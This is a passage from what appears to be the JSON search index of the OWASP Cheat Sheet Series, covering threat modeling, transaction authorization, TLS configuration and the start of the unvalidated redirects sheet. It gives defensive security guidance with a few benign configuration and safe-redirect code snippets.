Define Data Flows over the organization Data Flow Diagram.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-trust-boundaries","title":"Define Trust Boundaries","text":"

Define any distinct boundaries (External boundaries and Internal boundaries) within which a system trusts all sub-systems (including data).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-applications-user-roles-and-trust-levels","title":"Define applications user roles and trust levels","text":"

Define access rights that the application will grant to external entities and internal entities.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#highlight-authorization-per-user-role-over-the-dfd","title":"Highlight Authorization per user role over the DFD","text":"

Highlight Authorization per user role, for example, defining app users\u2019 role, admins\u2019 role, anonymous visitors\u2019 role...etc.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-application-entry-points","title":"Define Application Entry points","text":"

Define the interfaces through which potential attackers can interact with the application or supply them with data.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-threat-agents","title":"Identify Threat Agents","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-all-possible-threats","title":"Define all possible threats","text":"

Identify Possible Attackers threat agents that could exist within the Target of Evaluation. Use Means, Motive, and Opportunities to understand Threats posed by Attackers. Then associate threat agents with system components they can directly interact with.

Work on minimizing the number of threat agents by:

The user of this cheat can depend on the following list of risks and threat libraries sources to define the possible threats an application might be facing:

  1. Risks with OWASP Top 10.
  2. Testing Procedure with OWASP ASVS.
  3. Risks with SANS Top 25.
  4. Microsoft STRIDE.
  5. Continuous Threat Modeling CTM.
"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#map-threat-agents-to-application-entry-points","title":"Map Threat agents to application Entry points","text":"

Map threat agents to the application entry point, whether it is a login process, a registration process or whatever it might be and consider insider Threats.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#draw-attack-vectors-and-attacks-tree","title":"Draw attack vectors and attacks tree","text":"

During this phase conduct the following activities:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#mapping-abuse-cases-to-use-cases","title":"Mapping Abuse Cases to Use Cases","text":"

This is a very important step that can help identifying application logical threats. List of all possible abuse cases should be developed for each application use case. Being familiar with the types of application logical attack is an important during the mapping process. You can refer to OWASP Testing Guide 4.0: Business Logic Testing and OWASP ASVS for more details.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#re-define-attack-vectors","title":"Re-Define attack vectors","text":"

In most cases after defining the attack vectors, the compromised user role could lead to further attacks into the application. For example, assuming that an internet banking user credentials could be compromised, the user of this cheat sheet has to then redefine the attack vectors that could result from compromising the user\u2019s credentials and so on.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#write-your-threat-traceability-matrix","title":"Write your Threat traceability matrix","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-the-impact-and-probability-for-each-threat","title":"Define the Impact and Probability for each threat","text":"

Enumerate Attacks posed by the most dangerous attacker in designated areas of the logical and physical maps of the target of evaluation.

Assume the attacker has a zero-day because he does. In this methodology, we assume compromise; because a zero-day will exist or already does exist (even if we don't know about it). This is about what can be done by skilled attackers, with much more time, money, motive and opportunity that we have.

Use risk management methodology to determine the risk behind the threat

Create risks in risk log for every identified threat or attack to any assets. A risk assessment methodology is followed in order to identify the risk level for each vulnerability and hence for each server.

Here we will highlight two risk methodology that could be used:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#dread","title":"DREAD","text":"

DREAD, is about evaluating each existing vulnerability using a mathematical formula to retrieve the vulnerability\u2019s corresponding risk. The DREAD formula is divided into 5 main categories:

DREAD formula is:

Risk Value = (Damage + Affected users) x (Reproducibility + Exploitability + Discoverability).

Then the risk level is determined using defined thresholds below.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#pasta","title":"PASTA","text":"

PASTA, Attack Simulation & Threat Analysis (PASTA) is a complete methodology to perform application threat modeling. PASTA introduces a risk-centric methodology aimed at applying security countermeasures that are commensurate to the possible impact that could be sustained from defined threat models, vulnerabilities, weaknesses, and attack patterns.

PASTA introduces a complete risk analysis and evaluation procedures that you can follow to evaluate the risk for each of the identified threat. The main difference in using PASTA Approach is that you should evaluate the impact early on in the analysis phase instead of addressing the impact at the step of evaluating the risk.

The idea behind addressing the impact earlier in PASTA approach is that the audience that knows impact knows the consequences on a product or use case failures more than participants in the threat analysis phase.

Application security risk assessments are not enough because they are very binary and leverage a control framework basis for denoting risks. It is recommended to contextually look at threats impacts, probability and effectiveness of countermeasures that may be present.

R = (TVP*I) / Countermeasures

For more details about PASTA.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#rank-risks","title":"Rank Risks","text":"

Using risk matrix rank risks from most severe to least severe based on Means, Motive & Opportunity. Below is a sample risk matrix table, depending on your risk approach you can define different risk ranking matrix:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#determine-countermeasures-and-mitigation","title":"Determine countermeasures and mitigation","text":"

Identify risk owners and agree on risk mitigation with risk owners and stakeholders. Provide the needed controls in forms of code upgrades and configuration updates to reduce risks to acceptable levels.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-risk-owners","title":"Identify risk owners","text":"

For the assessors: After defining and analyzing the risks, the assessor should be working on the mitigation plan by firstly identifying risk owners which is the personnel that is responsible for mitigating the risk. i.e. one of the information security team or the development team.

For the designers or the architects: they should assign the risk mitigation to the development team to consider it while building the application.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#agree-on-risk-mitigation-with-risk-owners-and-stakeholders","title":"Agree on risk mitigation with risk owners and stakeholders","text":"

After identifying the risk owners, it is important to review the mitigation controls for each of the identified risks. Some controls might be inapplicable, you should propose other mitigation controls or discuss with the risk owners the possible compensation controls.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#build-your-risk-treatment-strategy","title":"Build your risk treatment strategy","text":"

For the assessor, this is considered as the last step in the assessment process. The following steps should be conducted by the risk owner, however, the assessor shall engage in 6.5 (Testing risk treatment) to verify the remediation.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#select-appropriate-controls-to-mitigate-the-risk","title":"Select appropriate controls to mitigate the risk","text":"

Selecting one of the controls to reduce the risk, either by upgrading the code, or building a specific configuration during the deployment phase and so on.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#test-risk-treatment-to-verify-remediation","title":"Test risk treatment to verify remediation","text":"

Mitigation controls will not vanish the risk completely, rather, it would just reduce the risk. In this case, the user of this cheat sheet should measure the value of the risk after applying the mitigation controls. The value of the risk should be reduced to the acceptable criteria set earlier.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#reduce-risk-in-risk-log-for-verified-treated-risk","title":"Reduce risk in risk log for verified treated risk","text":"

After applying the mitigation and measuring the new risk value, the user of this cheat sheet should update the risk log to verify that risk has been reduced.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#periodically-retest-risk","title":"Periodically retest risk","text":"

Application threat modeling is an ongoing process, in addition to the changes that might be happened to the application that may require re-evaluating the expected threats, it is also important to do periodic retest for the identified risks and the implemented risk treatments.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#appendix","title":"Appendix","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html","title":"Transaction Authorization Cheat Sheet","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#purpose-and-audience","title":"Purpose and audience","text":"

The Purpose of this cheat sheet is to provide guidelines on how to securely implement transaction authorization to protect it from being bypassed. These guidelines can be used by:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Some applications use a second factor to check whether an authorized user is performing sensitive operations. A common example is wire transfer authorization, typically used in online or mobile banking applications.

For the purpose of this document we will call that process: transaction authorization.

Usage scenarios are not only limited to financial systems. For example: an email with a secret code or a link with some kind of token to unlock a user account is also a special case of transaction authorization. A user authorizes the operation of account unlocking by using a second factor (a unique code sent to his email address). Transaction authorization can be implemented using various methods, e.g.:

Some of these can be implemented on a physical device or in a mobile application.

Transaction authorization is implemented in order to protect for unauthorized wire transfers as a result of attacks using malware, phishing, password or session hijacking, CSRF, XSS, etc.. Unfortunately, as with any piece of code, this protection can be improperly implemented and as a result it might be possible to bypass this safeguard.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#1-functional-guidelines","title":"1. Functional Guidelines","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#11-transaction-authorization-method-has-to-allow-a-user-to-identify-and-acknowledge-significant-transaction-data","title":"1.1 Transaction authorization method has to allow a user to identify and acknowledge significant transaction data","text":"

User's computers cannot be trusted due to malware threats. Hence a method that prevents a user from identifying transaction on an external device cannot be considered as secure. Transaction data should be presented and acknowledged using an external authorization component.

Such transaction authorization components should be built using the What You See Is What You Sign principle. When a user authorizes a transaction they need to know what they are authorizing. Based on this principle, an authorization method must permit a user to identify and acknowledge the data that is significant to a given transaction. For example, in the case of a wire transfer: the target account and amount.

The decision about which transaction data can be considered as significant should be chosen based on:

For example when an SMS message is used to send significant transaction data, it is possible to send the target account, amount and type of transfer. However, for an unconnected CAP reader it is perceived to be inconvenient for a user to enter these data. In such cases, entering only the most significant transaction data (e.g. partial target account number and amount) can be considered sufficient.

In general, significant transaction data should always be presented as an inherent part of the transaction authorization process. Whereas the user experience should be designed to encourage users to verify the transaction data.

If a transaction process requires a user to enter transaction data into an external device, the user should be prompted for providing specific value (e.g. a target account number). Entering a value without meaningful prompt could be easily abused by malware using social engineering techniques as described in the example in paragraph 1.4. Also, for more detailed discussion of input overloading problems, see here.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#12-change-of-authorization-token-should-be-authorized-using-the-current-authorization-token","title":"1.2 Change of authorization token should be authorized using the current authorization token","text":"

When a user is allowed to change authorization token by using the application interface, the operation should be authorized by using his current authorization credentials (as is the case with password change procedure). For example: when a user changes a phone number for SMS codes an authorization SMS code should be sent to the current phone number.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#13-change-of-authorization-method-should-be-authorized-using-the-current-authorization-method","title":"1.3 Change of authorization method should be authorized using the current authorization method","text":"

Some applications allow a user to chose between multiple methods of transaction authorization. In such cases, the user should authorize the change in authorization method using his current authorization method. Otherwise, malware may change the authorization method to the most vulnerable method.

Additionally, the application should inform the user about the potential dangers associated to the selected authorization method.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#14-users-should-be-able-to-easily-distinguish-the-authentication-process-from-the-transaction-authorization-process","title":"1.4 Users should be able to easily distinguish the authentication process from the transaction authorization process","text":"

Malware can trick users in authorizing fraudulent operations, when an application requires a user to perform the same actions for authentication as for transaction authorization. Consider the following example:

In the abovementioned scenario, the same method was used to authenticate the user and to authorize the transaction. Malware can abuse this behavior to extract transaction authorization credentials without the user's knowledge. Social engineering methods can be used despite utilized authentication and operation authorization methods but the application shouldn't simplify such attack scenarios.

Safeguards should allow the user to easily distinguish authentication from transaction authorization. This could be achieved by:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#15-each-transaction-should-be-authorized-using-unique-authorization-credentials","title":"1.5 Each transaction should be authorized using unique authorization credentials","text":"

Some applications are asking for transaction authorization credentials only once, e.g. static password, code sent through SMS, token response. Afterwards a user is able to authorize any transaction during the whole user's session or at least they have to reuse the same credentials each time they need to authorize a transaction. Such behavior is not sufficient to prevent malware attacks because malware will sniff such credentials and use them to authorize any transaction without the user's knowledge.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#2-non-functional-guidelines","title":"2. Non-functional guidelines","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#21-authorization-should-be-performed-and-enforced-server-side","title":"2.1 Authorization should be performed and enforced server-side","text":"

As for all other security controls transaction authorization should be enforced server-side. By no means it should be possible to influence the authorization result by altering data which flows from a client to a server, e.g. by:

To achieve this, security programming best practices should be applied, such as:

To avoid tampering, additional safeguards should be considered. For example by cryptographically protecting the data for confidentiality and integrity and while decrypting and verifying the data server side.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#22-authorization-method-should-be-enforced-server-side","title":"2.2 Authorization method should be enforced server side","text":"

When multiple transaction authorization methods are available to the user. The server should enforce the use of the current authorization method chosen by the user in the application settings or enforced by application policies. It should be impossible to change an authorization method by manipulating the parameters provided from the client. Otherwise, malware can downgrade an authorization method to a less or even the least secure authorization method.

This is especially important when an application is developed to add a new, more secure authorization method. It is not very rare,that a new authorization method is built on top of an old codebase. As a result, when a client is sending parameters using the old method, the transaction may be authorized, despite the fact that the user has already switched to a new method.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#23-transaction-verification-data-should-be-generated-server-side","title":"2.3 Transaction verification data should be generated server-side","text":"

When significant transaction data are transmitted programmatically to an authorization component, extra care should be put into denying client modifications on the transaction data at authorization. Significant transaction data that has to be verified by the user, should be generated and stored on a server, then passed to an authorization component without any possibility of tampering by the client.

A common anti pattern is to collect significant transaction data client-side and pass it to the server. In such cases, malware can manipulate these data and as a result, show faked transaction data in an authorization component.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#24-application-should-prevent-authorization-credentials-brute-forcing","title":"2.4 Application should prevent authorization credentials brute-forcing","text":"

When transaction authorization credentials are sent to the server for verification, an application has to prevent brute-forcing. The transaction authorization process must be restarted after number of failed authorization attempts. In addition other anti brute-forcing and anti-automation techniques should be considered to prevent an attacker from automating his attacks,see OWASP Authentication Cheat Sheet.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#25-application-should-control-which-transaction-state-transitions-are-allowed","title":"2.5 Application should control which transaction state transitions are allowed","text":"

Transaction authorization is usually performed in multiple steps, e.g.:

  1. The user enters the transaction data.
  2. The user requests authorization.
  3. The application initializes an authorization mechanism.
  4. The user verifies/confirms the transaction data.
  5. The user responds with the authorization credentials.
  6. The application validates authorization and executes a transaction.

An application should process such business logic flow in sequential step order and preventing a user from performing these steps out of order or in even skipping any of these steps (see OWASP ASVS requirement 15.1).

This should protect against attack techniques such as:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#26-transaction-data-should-be-protected-against-modification","title":"2.6 Transaction data should be protected against modification","text":"

The transaction authorization process should protect against attack scenarios that modify transaction data after the initial entry by the user. For example, a bad implementation of a transaction authorization process may allow the following attacks (for reference, see steps of transaction authorization described in paragraph 2.5):

The protection against modification could be implemented using various techniques depending on the framework used, but one or more of the following should be present:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#27-confidentiality-of-the-transaction-data-should-be-protected-during-any-client-server-communications","title":"2.7 Confidentiality of the transaction data should be protected during any client / server communications","text":"

The transaction authorization process should protect the privacy of transaction data being presented to the user to authorize i.e. at section 2.5, steps 2 and 4.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#28-when-a-transaction-is-executed-the-system-should-check-whether-it-was-authorized","title":"2.8 When a transaction is executed, the system should check whether it was authorized","text":"

The result of the transaction entry and the authorization process described in paragraph 2.5 is the transaction execution. Just before the transaction is executed there should be a final control gate which verifies whether the transaction was properly authorized by the user. Such control, tied to execution, should prevent attacks such as:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#29-authorization-credentials-should-be-valid-only-by-limited-period-of-time","title":"2.9 Authorization credentials should be valid only by limited period of time","text":"

In some malware attacks scenarios, authorization credentials entered by the user is passed to malware command and control server (C&C) and then used from an attacker-controlled machine. Such a process is often performed manually by an attacker. To make such attacks difficult, the server should allow authorizing the transaction only in a limited time window between generating of challenge or OTP and the transaction authorization. Additionally, such safeguard will also aid in preventing resource exhaustion attacks. The time window should be carefully selected to not disrupt normal users' behavior.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#210-authorization-credentials-should-be-unique-for-every-operation","title":"2.10 Authorization credentials should be unique for every operation","text":"

To prevent all sorts of replay attacks, authorization credentials should be unique for every operation. It could be achieved using different methods depending on the applied transaction authorization mechanism. For example: using a timestamp, a sequence number or a random value in signed transaction data or as a part of a challenge.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#remarks","title":"Remarks","text":"

We identify other issues that should be taken into consideration while implementing transaction authorization. However we deem to be beyond the scope of this cheat sheet:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#references-and-future-reading","title":"References and future reading","text":"

References and future reading:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html","title":"Transport Layer Protection Cheat Sheet","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance on how to implement transport layer protection for an application using Transport Layer Security (TLS). When correctly implemented, TLS can provides a number of security benefits:

TLS is used by many other protocols to provide encryption and integrity, and can be used in a number of different ways. This cheatsheet is primarily focused on how to use TLS to protect clients connecting to a web application over HTTPS; although much of the guidance is also applicable to other uses of TLS.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#ssl-vs-tls","title":"SSL vs TLS","text":"

Secure Socket Layer (SSL) was the original protocol that was used to provide encryption for HTTP traffic, in the form of HTTPS. There were two publicly released versions of SSL - versions 2 and 3. Both of these have serious cryptographic weaknesses and should no longer be used.

For various reasons the next version of the protocol (effectively SSL 3.1) was named Transport Layer Security (TLS) version 1.0. Subsequently TLS versions 1.1, 1.2 and 1.3 have been released.

The terms \"SSL\", \"SSL/TLS\" and \"TLS\" are frequently used interchangeably, and in many cases \"SSL\" is used when referring to the more modern TLS protocol. This cheatsheet will use the term \"TLS\" except where referring to the legacy protocols.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#server-configuration","title":"Server Configuration","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#only-support-strong-protocols","title":"Only Support Strong Protocols","text":"

The SSL protocols have a large number of weaknesses, and should not be used in any circumstances. General purpose web applications should default to TLS 1.3 (support TLS 1.2 if necessary) with all other protocols disabled. Where it is known that a web server must support legacy clients with unsupported an insecure browsers (such as Internet Explorer 10), it may be necessary to enable TLS 1.0 to provide support.

Where legacy protocols are required, the \"TLS_FALLBACK_SCSV\" extension should be enabled in order to prevent downgrade attacks against clients.

Note that PCI DSS forbids the use of legacy protocols such as TLS 1.0.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#only-support-strong-ciphers","title":"Only Support Strong Ciphers","text":"

There are a large number of different ciphers (or cipher suites) that are supported by TLS, that provide varying levels of security. Where possible, only GCM ciphers should be enabled. However, if it is necessary to support legacy clients, then other ciphers may be required.

At a minimum, the following types of ciphers should always be disabled:

See the TLS Cipher String Cheat Sheet for full details on securely configuring ciphers.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-diffie-hellman-parameters","title":"Use Strong Diffie-Hellman Parameters","text":"

Where ciphers that use the ephemeral Diffie-Hellman key exchange are in use (signified by the \"DHE\" or \"EDH\" strings in the cipher name) sufficiently secure Diffie-Hellman parameters (at least 2048 bits) should be used

The following command can be used to generate 2048 bit parameters:

openssl dhparam 2048 -out dhparam2048.pem\n

The Weak DH website provides guidance on how various web servers can be configured to use these generated parameters.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#disable-compression","title":"Disable Compression","text":"

TLS compression should be disabled in order to protect against a vulnerability (nicknamed CRIME) which could potentially allow sensitive information such as session cookies to be recovered by an attacker.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#patch-cryptographic-libraries","title":"Patch Cryptographic Libraries","text":"

As well as the vulnerabilities in the SSL and TLS protocols, there have also been a large number of historic vulnerability in SSL and TLS libraries, with Heartbleed being the most well known. As such, it is important to ensure that these libraries are kept up to date with the latest security patches.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#test-the-server-configuration","title":"Test the Server Configuration","text":"

Once the server has been hardened, the configuration should be tested. The OWASP Testing Guide chapter on SSL/TLS Testing contains further information on testing.

There are a number of online tools that can be used to quickly validate the configuration of a server, including:

Additionally, there are a number of offline tools that can be used:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#certificates","title":"Certificates","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-keys-and-protect-them","title":"Use Strong Keys and Protect Them","text":"

The private key used to generate the cipher key must be sufficiently strong for the anticipated lifetime of the private key and corresponding certificate. The current best practice is to select a key size of at least 2048 bits. Additional information on key lifetimes and comparable key strengths can be found here and in NIST SP 800-57.

The private key should also be protected from unauthorized access using filesystem permissions and other technical and administrative controls.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-cryptographic-hashing-algorithms","title":"Use Strong Cryptographic Hashing Algorithms","text":"

Certificates should use SHA-256 for the hashing algorithm, rather than the older MD5 and SHA-1 algorithms. These have a number of cryptographic weaknesses, and are not trusted by modern browsers.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-correct-domain-names","title":"Use Correct Domain Names","text":"

The domain name (or subject) of the certificate must match the fully qualified name of the server that presents the certificate. Historically this was stored in the commonName (CN) attribute of the certificate. However, modern versions of Chrome ignore the CN attribute, and require that the FQDN is in the subjectAlternativeName (SAN) attribute. For compatibility reasons, certificates should have the primary FQDN in the CN, and the full list of FQDNs in the SAN.

Additionally, when creating the certificate, the following should be taken into account:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#carefully-consider-the-use-of-wildcard-certificates","title":"Carefully Consider the use of Wildcard Certificates","text":"

Wildcard certificates can be convenient, however they violate the principal of least privilege, as a single certificate is valid for all subdomains of a domain (such as *.example.org). Where multiple systems are sharing a wildcard certificate, the likelihood that the private key for the certificate is compromised increases, as the key may be present on multiple systems. Additionally, the value of this key is significantly increased, making it a more attractive target for attackers.

The issues around the use of wildcard certificates are complicated, and there are various other discussions of them online.

When risk assessing the use of wildcard certificates, the following areas should be considered:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-an-appropriate-certification-authority-for-the-applications-user-base","title":"Use an Appropriate Certification Authority for the Application's User Base","text":"

In order to be trusted by users, certificates must be signed by a trusted certificate authority (CA). For Internet facing applications, this should be one of the CAs which are well-known and automatically trusted by operating systems and browsers.

The LetsEncrypt CA provides free domain validated SSL certificates, which are trusted by all major browsers. As such, consider whether there are any benefits to purchasing a certificate from a CA.

For internal applications, an internal CA can be used. This means that the FQDN of the certificate will not be exposed (either to an external CA, or publicly in certificate transparency lists). However, the certificate will only be trusted by users who have imported and trusted the internal CA certificate that was used to sign them.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-caa-records-to-restrict-which-cas-can-issue-certificates","title":"Use CAA Records to Restrict Which CAs can Issue Certificates","text":"

Certification Authority Authorization (CAA) DNS records can be used to define which CAs are permitted to issue certificates for a domain. The records contains a list of CAs, and any CA who is not included in that list should refuse to issue a certificate for the domain. This can help to prevent an attacker from obtaining unauthorized certificates for a domain through a less-reputable CA. Where it is applied to all subdomains, it can also be useful from an administrative perspective by limiting which CAs administrators or developers are able to use, and by preventing them from obtaining unauthorized wildcard certificates.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#always-provide-all-needed-certificates","title":"Always Provide All Needed Certificates","text":"

In order to validate the authenticity of a certificate, the user's browser must examine the certificate that was used to sign it and compare it to the list of CAs trusted by their system. In many cases the certificate is not directly signed by a root CA, but is instead signed by an intermediate CA, which is in turn signed by the root CA.

If the user does not know or trust this intermediate CA then the certificate validation will fail, even if the user trusts the ultimate root CA, as they cannot establish a chain of trust between the certificate and the root. In order to avoid this, any intermediate certificates should be provided alongside the main certificate.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-the-use-of-extended-validation-certificates","title":"Consider the use of Extended Validation Certificates","text":"

Extended validation (EV) certificates claim to provide a higher level of verification of the entity, as they perform checks that the requestor is a legitimate legal entity, rather than just verifying the ownership of the domain name like normal (or \"Domain Validated\") certificates. This can effectively be viewed as the difference between \"This site is really run by Example Company Inc.\" vs \"This domain is really example.org\".

Historically these displayed differently in the browser, often showing the company name or a green icon or background in the address bar. However, as of 2019 both Chrome and Firefox have announced that they will be removing these indicators, as they do not believe that EV certificates provide any additional protection.

There is no security downside to the use of EV certificates. However, as they are significantly more expensive than domain validated certificates, an assessment should be made to determine whether they provide any additional value

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#application","title":"Application","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-tls-for-all-pages","title":"Use TLS For All Pages","text":"

TLS should be used for all pages, not just those that are considered sensitive such as the login page. If there are any pages that do not enforce the use of TLS, these could give an attacker an opportunity to sniff sensitive information such as session tokens, or to inject malicious JavaScript into the responses to carry out other attacks against the user.

For public facing applications, it may be appropriate to have the web server listening for unencrypted HTTP connections on port 80, and then immediately redirecting them with a permanent redirect (HTTP 301) in order to provide a better experience to users who manually type in the domain name. This should then be supported with the HTTP Strict Transport Security (HSTS) header to prevent them accessing the site over HTTP in the future.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#do-not-mix-tls-and-non-tls-content","title":"Do Not Mix TLS and Non-TLS Content","text":"

A page that is available over TLS should not include any resources (such as JavaScript or CSS) files which are loaded over unencrypted HTTP. These unencrypted resources could allow an attacker to sniff session cookies or inject malicious code into the page. Modern browsers will also block attempts to load active content over unencrypted HTTP into secure pages.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-the-secure-cookie-flag","title":"Use the \"Secure\" Cookie Flag","text":"

All cookies should be marked with the \"Secure\" attribute, which instructs the browser to only send them over encrypted HTTPS connections, in order to prevent them from being sniffed from an unencrypted HTTP connection. This is important even if the website does not listen on HTTP (port 80), as an attacker performing an active man in the middle attack could present a spoofed webserver on port 80 to the user in order to steal their cookie.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#prevent-caching-of-sensitive-data","title":"Prevent Caching of Sensitive Data","text":"

Although TLS provides protection of data while it is in transit, it does not provide any protection for data once it has reached the requesting system. As such, this information may be stored in the cache of the user's browser, or by any intercepting proxies which are configured to perform TLS decryption.

Where sensitive data is returned in responses, HTTP headers should be used to instruct the browser and any proxy servers not to cache the information, in order to prevent it being stored or returned to other users. This can be achieved by setting the following HTTP headers in the response:

Cache-Control: no-cache, no-store, must-revalidate\nPragma: no-cache\nExpires: 0\n
"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-http-strict-transport-security","title":"Use HTTP Strict Transport Security","text":"

HTTP Strict Transport Security (HSTS) instructs the user's browser to always request the site over HTTPS, and also prevents the user from bypassing certificate warnings. See the HTTP Strict Transport Security cheatsheet for further information on implementing HSTS.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-the-use-of-client-side-certificates","title":"Consider the use of Client-Side Certificates","text":"

In a typical configuration, TLS is used with a certificate on the server so that the client is able to verify the identity of the server, and to provide an encrypted connection between them. However, there are two main weaknesses with this approach:

Client certificates address both of these issues by requiring that the client proves their identity to the server with their own certificate. This not only provides strong authentication of the identity of the client, but also prevents an intermediate party from performing TLS decryption, even if they have trusted CA certificate on the client system.

Client certificates are rarely used on public systems due to a number of issues:

However, they should be considered for high-value applications or APIs, especially where there are a small number of technically sophisticated users, or where all users are part of the same organisation.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-using-public-key-pinning","title":"Consider Using Public Key Pinning","text":"

Public key pinning can be used to provides assurance that the server's certificate is not only valid and trusted, but also that it matches the certificate expected for the server. This provides protection against an attacker who is able to obtain a valid certificate, either by exploiting a weakness in the validation process, compromising a trusted certificate authority, or having administrative access to the client.

Public key pinning was added to browsers in the HTTP Public Key Pinning (HPKP) standard. However, due to a number of issues, it has subsequently been deprecated and is no longer recommended or supported by modern browsers.

However, public key pinning can still provide security benefits for mobile applications, thick clients and server-to-server communication. This is discussed in further detail in the Pinning Cheat Sheet.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html","title":"Unvalidated Redirects and Forwards Cheat Sheet","text":""},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application's access control check and then forward the attacker to privileged functions that they would normally not be able to access.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#safe-url-redirects","title":"Safe URL Redirects","text":"

When we want to redirect a user automatically to another page (without an action of the visitor such as clicking on a hyperlink) you might implement a code such as the following:

Java

response.sendRedirect(\"http://www.mysite.com\");\n

PHP

<?php\n/*\u00a0Redirect\u00a0browser\u00a0*/\nheader(\"Location:\u00a0http://www.mysite.com\");\n/* Exit to prevent the rest of the code from executing */\nexit;\n?>\n

ASP .NET

Response.Redirect(\"~/folder/Login.aspx\")\n

Rails

redirect_to\u00a0login_path\n

Rust actix web

  Ok(HttpResponse::Found()\n.insert_header((header::LOCATION, \"https://mysite.com/\"))\n.finish())\n

